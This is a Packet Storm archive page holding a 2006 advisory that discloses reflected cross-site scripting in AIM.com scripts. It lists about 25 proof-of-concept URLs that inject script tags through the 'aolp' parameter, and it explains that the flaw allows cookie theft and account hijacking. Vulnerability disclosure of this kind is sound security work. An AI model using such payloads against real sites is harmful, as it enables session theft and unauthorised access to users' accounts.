exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

aimXSS.txt

aimXSS.txt
Posted Jan 10, 2006
Authored by Simo64 | Site morx.org

Various America Online (AOL) Instant Messenger scripts are susceptible to cross site scripting attacks. Full details provided.

tags | exploit, xss
SHA-256 | dedd64e2a408ea9097aad05922bad5eaa3287194a328da1f40e7a1224948cdae

aimXSS.txt

Change Mirror Download
Title: AIM Multiple Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: 26 December 2005
Published: 7 January 2006
MorX Security Research Team
http://www.morx.org

Service: Web

Vendor: AIM.com

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Severity: Medium/High

Tested on: Microsoft IE 6.0 and FireFox 5.1

Details:

AIM.com search engines are created with AOLserver Dynamic Pages (or ADP).
ADP are a set of web server extensions for designing dynamically created
documents. Utilizing AOLserver, ADP return a document to the user based on
running a set of Tcl code with arguments provided by the user. They are
based on Microsoft's own Active Server Pages.
AIM.com ADP scripts are prone to cross-site scripting attacks. This
problem is due to a failure in the applications to properly sanitize
user-supplied input.

Impact:

an attacker can exploit the vulnerable scripts to have arbitrary script
code executed in the browser of an authentified AIM user in the context of
the AIM webpage. resulting in the theft of cookie-based authentication
giving the attacker temporary access to the victim's account (email box,
etc) as well as other type of attacks.

Screen captures:

http://www.morx.org/AIM-XSS.jpg
http://www.morx.org/AIM2-XSS.JPG
http://www.morx.org/AIM3-XSS.JPG
http://www.morx.org/AIM4-XSS.JPG

Affected scripts with proof of concept exploit:

http://www.aim.com/acronyms.adp?aolp="><script>alert(document.cookie)</script>
http://www.aim.com/remote/step1.adp?aolp=><script>alert(document.cookie)</script>
http://www.aim.com/remote/index.adp?aolp="><script>alert('VULNERABLE')</script>
http://www.aim.com/developer.adp?aolp=><script>alert('VULNERABLE')</script>
http://www.aim.com/get_aim/express/aim_expr.adp?aolp=><script>alert('VULNERABLE')</script>
http://www.aim.com/international.adp?aolp=""><script>alert('VULNERABLE')</script>
http://www.aim.com/help_faq/security/faq.adp?aolp=><script>alert('VULNERABLE')</script>
http://www.aim.com/help_faq/security/trojan.adp?aolp=><script>alert('VULNERABLE')</script>
http://www.aim.com/emoticons.adp?aolp=><script>alert('VULNERABLE')</script>
http://www.aim.com/chats.adp?aolp="><script>alert('VULNERABLE')</script>
http://www.aim.com/download.adp?aolp="><script>alert('VULNERABLE')</script>
http://www.aim.com/get_aim/linux/latest_linux.adp?aolp="><script>alert('VULNERABLE')</script>
http://www.aim.com/get_aim/win/other_win.adp?aolp="><script>alert('VULNERABLE')</script>
http://www.aim.com/get_aim/win/latest_win.adp?aolp="><script>alert('VULNERABLE')</script>
http://www.aim.com/help_faq/using/aimexpress.adp?aolp="><script>alert('VULNERABLE')</script>
http://www.aim.com/help_faq/gethelp.adp?aolp="><script>alert('VULNERABLE')</script>
http://www.aim.com/help_faq/security/report.adp?aolp=><script>alert('VULNERABLE')</script>
http://www.aim.com/help_faq/error_mess/index.adp?aolp=><script>alert('VULNERABLE')</script>
http://www.aim.com/help_faq/starting_out/index.adp?aolp=><script>alert('VULNERABLE')</script>
http://www.aim.com/help_faq/using/index.adp?aolp=><script>alert('VULNERABLE')</script>
http://www.aim.com/help_faq/forgot_password/password.adp?aolp=><script>alert('VULNERABLE')</script>
http://www.aim.com/tos/privacy_policy.adp?aolp=><script>alert('VULNERABLE')</script>
http://www.aim.com/help_faq/error_mess/winerrors_buddylist.adp?aolp="><script>alert('VULNERABLE')</script>
http://www.aim.com/help_faq/using/aimexpress.adp?aolp=
http://us.video.aim.com/speed.adp?msg=large&url=%2fmain%2eadp%3f"><script>alert('VULNERABLE')</script>

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close